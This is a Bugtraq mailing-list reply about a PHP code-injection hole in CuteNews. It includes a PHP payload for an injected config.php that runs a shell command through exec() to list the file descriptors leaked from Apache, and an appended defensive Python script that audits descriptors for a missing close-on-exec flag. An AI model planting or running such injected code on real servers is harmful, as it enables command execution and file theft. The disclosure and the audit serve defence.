Bugtraq mailing list archives
Re: PHP code injection in CuteNews
From: Steve Grubb <linux_4ever () yahoo com>
Date: 28 Feb 2003 22:18:05 -0000
In-Reply-To: <E18ndJT-000JS2-00 () f19 mail ru>

Hello,

If the CuteNews website is running Apache 2.x, which leaks descriptors to all kinds of things

http://marc.theaimsgroup.com/?l=vuln-dev&m=104585997219471&w=2

then you can do this:

config.php =

    <html><head><title>File List</title></head>
    <body>
    <?php
    // $$ is expanded by the shell that exec() starts, so this lists
    // the descriptors that shell inherited from the web server.
    $cmd = "/bin/ls -l /proc/$$/fd";
    exec($cmd, $dir_listing, $status);
    foreach($dir_listing as $item) {
        // ls -l prints "N -> target"; keep the part after the arrow
        $match = preg_split("/> /", $item);
        if ($match[1]) {
            // only print targets that are filesystem paths
            if (preg_match("/\//", $match[1])) {
                echo $match[1];
                echo "<br>";
            }
        }
    }
    ?>
    </body></html>

It doesn't take a lot more to make this a fully clickable file transfer utility that sandboxes or jails cannot protect.

-Steve Grubb
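Added example, not part of the original post: the message above depends on a server process passing open descriptors to the programs it executes, so this is one way a defender could audit a process for descriptors that lack the close-on-exec flag. It reads the Linux /proc/<pid>/fd and /proc/<pid>/fdinfo layout; the function names, PID 4242 and the sample paths are assumptions constructed for the example.

```python
import os
import tempfile

def inheritable_fds(pid, proc_root="/proc"):
    """Return [(fd, target)] for descriptors above stderr lacking close-on-exec."""
    base = os.path.join(proc_root, str(pid))
    leaked = []
    for name in sorted(os.listdir(os.path.join(base, "fd")), key=int):
        if int(name) <= 2:
            continue  # stdin/stdout/stderr are meant to be inherited
        try:
            target = os.readlink(os.path.join(base, "fd", name))
            with open(os.path.join(base, "fdinfo", name)) as fh:
                fields = dict(l.split(":", 1) for l in fh if ":" in l)
        except OSError:
            continue  # descriptor was closed while scanning
        flags = int(fields.get("flags", "0").strip(), 8)  # octal in fdinfo
        if not flags & os.O_CLOEXEC:
            leaked.append((int(name), target))
    return leaked

def sample_proc(pid=4242):
    """Build a constructed /proc-style tree (not real process data)."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, str(pid), "fd"))
    os.makedirs(os.path.join(root, str(pid), "fdinfo"))
    sample = [
        (0, "/dev/null", os.O_RDONLY),
        (3, "/var/log/httpd/error_log", os.O_WRONLY | os.O_APPEND),
        (4, "socket:[12345]", os.O_RDWR),
        (5, "/var/www/data/users.db", os.O_RDWR | os.O_CLOEXEC),
    ]
    for fd, target, flags in sample:
        os.symlink(target, os.path.join(root, str(pid), "fd", str(fd)))
        with open(os.path.join(root, str(pid), "fdinfo", str(fd)), "w") as fh:
            fh.write("pos:\t0\nflags:\t0%o\n" % flags)
    return root

if __name__ == "__main__":
    for fd, target in inheritable_fds(4242, sample_proc()):
        print("fd %d -> %s is inherited across exec()" % (fd, target))
```

Descriptors the audit reports can be closed before exec or marked with FD_CLOEXEC (in Python, os.set_inheritable(fd, False)) so that child processes never receive them.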
Current thread:
- PHP code injection in CuteNews Over_G (Feb 25)
- <Possible follow-ups>
- Re: PHP code injection in CuteNews Steve Grubb (Feb 28)